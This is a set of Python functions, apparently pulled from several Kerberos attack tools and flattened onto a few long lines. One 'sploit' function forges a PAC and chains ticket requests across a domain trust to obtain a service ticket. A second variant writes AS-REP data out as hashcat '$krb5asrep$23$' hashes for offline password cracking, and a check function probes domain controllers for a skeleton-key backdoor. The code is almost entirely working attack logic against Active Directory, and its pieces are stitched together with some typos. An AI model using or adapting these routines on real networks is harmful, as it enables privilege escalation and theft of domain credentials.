def net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a): if 'pre' in krbTricks.set_arg: if krbTricks.set_arg['pre'] == True: krbTricks.set_arg['padata_type'] = 2 else: krbTricks.set_arg['padata_type'] = 149 sys.stderr.write(' [+] Building AS-REQ for %s@%s...' % (user_name,user_realm)) sys.stderr.flush() nonce = getrandbits(31) current_time = time() pac_request=False as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request, krbTricks.set_arg['padata_type']) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(as_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') hdata = binascii.b2a_hex(data) #krbTricks.set_arg['pre'] = False if 'pre' in krbTricks.set_arg: if krbTricks.set_arg['pre'] == True: krbTricks.set_arg['net_krbas_tgs'] = hdata else: krbTricks.set_arg['net_krbas'] = hdata else: krbTricks.set_arg['net_krbas'] = hdata
def check(self, domain, dc_name, account): nonce = getrandbits(31) current_time = time() etype = AES256 as_req = build_as_req(get_netbios_domain(domain), account, None, current_time, nonce, True, etype) kdc_dns = "{dc_name}.{domain}".format(dc_name=dc_name, domain=domain) try: sock = send_req(as_req, kdc_dns, ) data = recv_rep(sock) err_enc = decode(data, asn1Spec=KrbError())[0] print(err_enc['error-code']) if err_enc['error-code'] == KDC_ERR_ETYPE_NOSUPP: # TODO 发现万能钥匙 return except timeout: pass except ConnectionRefusedError: pass except Exception as e: traceback.print_exc()
def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None): sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a) sys.stderr.flush() nonce = getrandbits(31) current_time = time() as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(as_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a) sys.stderr.flush() as_rep, as_rep_enc = decrypt_as_rep(data, user_key) session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue'])) logon_time = gt2epoch(str(as_rep_enc['authtime'])) tgt_a = as_rep['ticket'] sys.stderr.write(' Done!\n') if krbtgt_a_key is not None: print >> sys.sdterr, as_rep.prettyPrint() print >> sys.stderr, as_rep_enc.prettyPrint() ticket_debug(tgt_a, krbtgt_a_key) sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a) sys.stderr.flush() subkey = generate_subkey() nonce = getrandbits(31) current_time = time() pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time)) tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name, tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(tgs_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a) tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey) session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue'])) tgt_b = tgs_rep['ticket'] sys.stderr.write(' Done!\n') if trust_ab_key is not None: pretty_print_pac(pac[1]) print >> sys.stderr, tgs_rep.prettyPrint() print >> sys.stderr, tgs_rep_enc.prettyPrint() ticket_debug(tgt_b, trust_ab_key) if target_service is not None and target_host is not None and kdc_b is not None: sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b) sys.stderr.flush() subkey = generate_subkey() nonce = getrandbits(31) current_time = time() tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name, tgt_b, session_key2, subkey, nonce, current_time) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b) sys.stderr.flush() sock = send_req(tgs_req2, kdc_b) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b) tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey) sys.stderr.write(' Done!\n') else: tgs_rep2 = tgs_rep tgs_rep_enc2 = tgs_rep_enc sys.stderr.write(' [+] Creating ccache file %r...' % output_filename) cc = CCache((user_realm, user_name)) tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2) cc.add_credential(tgs_cred) cc.save(output_filename) sys.stderr.write(' Done!\n') if target_key is not None: print >> sys.stderr, tgs_rep2.prettyPrint() print >> sys.stderr, tgs_rep_enc2.prettyPrint() ticket_debug(tgs_rep2['ticket'], target_key)
def sploit(user_realm, user_name, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None): sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a) sys.stderr.flush() #nonce = getrandbits(31) nonce = 12381973 current_time = time() #as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False) as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=True) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(as_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a) sys.stderr.flush() as_rep, as_rep_enc = decrypt_as_rep(data, user_key) #session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue'])) #logon_time = gt2epoch(str(as_rep_enc['authtime'])) #tgt_a = as_rep['ticket'] sys.stderr.write(' Done!\n') enc_string = "".join("{:02x}".format(ord(c)) for c in as_rep_enc) hashcat_enc = enc_string[:32] + '$' + enc_string[32:] #sys.stderr.write('%s\n' % as_rep) sys.stderr.write('$krb5asrep$23$%s@%s:%s\n' % (user_name, user_realm, hashcat_enc)) #if krbtgt_a_key is not None: # print >> sys.sdterr, as_rep.prettyPrint() # print >> sys.stderr, as_rep_enc.prettyPrint() # ticket_debug(tgt_a, krbtgt_a_key) # sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a) # sys.stderr.flush() # subkey = generate_subkey() # nonce = getrandbits(31) # current_time = time() # pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time)) # tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name, # tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False) # sys.stderr.write(' Done!\n') # # sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a) # sys.stderr.flush() # sock = send_req(tgs_req, kdc_a) # sys.stderr.write(' Done!\n') # sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a) # sys.stderr.flush() # data = recv_rep(sock) # sys.stderr.write(' Done!\n') # sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a) # tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey) # session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue'])) # tgt_b = tgs_rep['ticket'] # sys.stderr.write(' Done!\n') # if trust_ab_key is not None: # pretty_print_pac(pac[1]) # print >> sys.stderr, tgs_rep.prettyPrint() # print >> sys.stderr, tgs_rep_enc.prettyPrint() # ticket_debug(tgt_b, trust_ab_key) # if target_service is not None and target_host is not None and kdc_b is not None: # sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b) # sys.stderr.flush() # subkey = generate_subkey() # nonce = getrandbits(31) # current_time = time() # tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name, # tgt_b, session_key2, subkey, nonce, current_time) # sys.stderr.write(' Done!\n') # sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b) # sys.stderr.flush() # sock = send_req(tgs_req2, kdc_b) # sys.stderr.write(' Done!\n') # sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b) # sys.stderr.flush() # data = recv_rep(sock) # sys.stderr.write(' Done!\n') # sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b) # tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey) # sys.stderr.write(' Done!\n') # else: # tgs_rep2 = tgs_rep # tgs_rep_enc2 = tgs_rep_enc # sys.stderr.write(' [+] Creating ccache file %r...' % output_filename) # cc = CCache((user_realm, user_name)) # tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2) # cc.add_credential(tgs_cred) # cc.save(output_filename) # sys.stderr.write(' Done!\n') # Output as-rep to file (hard-coded) atm file = open("hashcat.out", "a") file.write('$krb5asrep$23$%s@%s:%s\n' % (user_name, user_realm, hashcat_enc)) file.close()